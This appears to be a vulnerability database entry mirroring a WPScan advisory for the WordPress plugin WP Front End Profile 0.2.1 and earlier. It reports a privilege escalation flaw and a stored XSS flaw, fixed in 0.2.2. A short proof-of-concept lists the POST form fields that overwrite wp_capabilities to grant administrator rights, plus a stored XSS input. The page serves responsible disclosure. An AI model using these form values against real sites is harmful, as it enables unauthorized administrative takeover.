Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbPhil WylieWPVDB-ID:CB80F049-0433-44A0-9F9C-35A6E8DA820E
HistorySep 14, 2016 - 12:00 a.m.

WP Front End Profile <= 0.2.1 - Privilege Escalation & Stored Cross-Site Scripting (XSS)

2016-09-1400:00:00
Phil Wylie
wpscan.com
6

EPSS

0.002

Percentile

60.7%

JSON

It is possible to modify a POST request to overwrite user meta including ‘wp_capabilities’ and ‘wp_user_level’ which results in a privilege escalation vulnerability. User input is not sanitised or escaped on output resulting in a stored XSS vulnerability. Timeline: 2016-09-12: Vulnerability found 2016-09-12: Reported to vendor 2016-09-12: Vendor responded 2016-09-14: Vendor released a fixed version (0.2.2) 2016-09-14: Public disclosure

PoC

Privilege Escalation - Form data profile[user_email]:[email protected] profile[wp_capabilities][administrator]:1 profile[wp_user_level]:10 profile[user_url]: profile[description]: profile[wpfep_save]:Update Profile wpfep_nonce_name:99fc626e77 _wp_http_referer:/sample-page/ Stored XSS - Form data wpmark_tab[testing_field]:example"> wpmark_tab[wpfep_save]:Update Testing wpfep_nonce_name:02c01469d8 _wp_http_referer:/sample-page/

Related

wpexploit 1
cve 2
nvd 2
cvelist 2
prion 2
wpexploit
wpexploit
WP Front End Profile <= 0.2.1 - Privilege Escalation & Stored Cross-Site Scripting (XSS)
2016-09-14 00:00:00
cve
cve
CVE-2019-15110
2019-08-21 13:15:12
CVE-2019-15111
2019-08-21 13:15:12
nvd
nvd
CVE-2019-15111
2019-08-21 13:15:12
CVE-2019-15110
2019-08-21 13:15:12
cvelist
cvelist
CVE-2019-15111
2019-08-21 12:02:18
CVE-2019-15110
2019-08-21 12:01:02
prion
prion
Cross site scripting
2019-08-21 13:15:00
Privilege escalation
2019-08-21 13:15:00

EPSS

0.002

Percentile

60.7%

JSON
Related for WPVDB-ID:CB80F049-0433-44A0-9F9C-35A6E8DA820E
wpexploit1cve2nvd2cvelist2prion2